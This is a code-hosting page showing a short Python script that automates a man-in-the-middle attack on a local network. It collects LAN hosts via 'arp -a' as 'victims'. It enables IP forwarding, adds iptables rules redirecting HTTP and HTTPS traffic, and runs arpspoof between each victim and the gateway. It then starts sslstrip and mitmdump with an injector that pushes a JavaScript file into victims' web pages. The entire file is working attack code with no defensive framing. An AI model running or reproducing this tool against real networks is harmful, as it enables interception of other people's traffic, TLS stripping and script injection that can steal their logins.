You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

56 lines
1.8 KiB

7 years ago
  1. import subprocess, re, os, sys
  2. def get_victims():
  3. whitelist = 'whitelist.txt'
  4. victims = []
  5. ip_str = subprocess.check_output(['arp','-a']) # use arp -a to get connected devices
  6. ip_list = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", ip_str) # use regex to turn the output into a list
  7. if not os.path.isfile(whitelist):
  8. victims = ip_list
  9. print("No %s! Continuing...") % whitelist
  10. else:
  11. for ip in ip_list:
  12. if not ip in open('whitelist.txt').read():
  13. #add ip to victim's list if it's not in whitelist.txt
  14. victims.append(ip)
  15. else:
  16. print("Skipping whitelisted ip %s") % ip
  17. return victims
  18. #get gateway_ip (router)
  19. gateway = sys.argv[1]
  20. print("gateway: " + gateway)
  21. # get victims_ip
  22. victims = get_victims()
  23. print("victims: ")
  24. for v in victims:
  25. print(v)
  26. # configure routing (IPTABLES)
  27. os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
  28. os.system("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE")
  29. os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080")
  30. os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080")
  31. # run the arpspoof for each victim, each one in a new console
  32. for victim in victims:
  33. os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &")
  34. os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")
  35. # run SSLStrip on port 8000
  36. os.system("python sslstrip.py -l 8000 &")
  37. # start the http server for serving the script.js, in a new console
  38. os.system("xterm -hold -e 'python3 httpServer.py' &")
  39. # start the mitmproxy
  40. os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' -T")
  41. '''
  42. # run sslstrip
  43. os.system("xterm -e sslstrip -l 8080 &")
  44. '''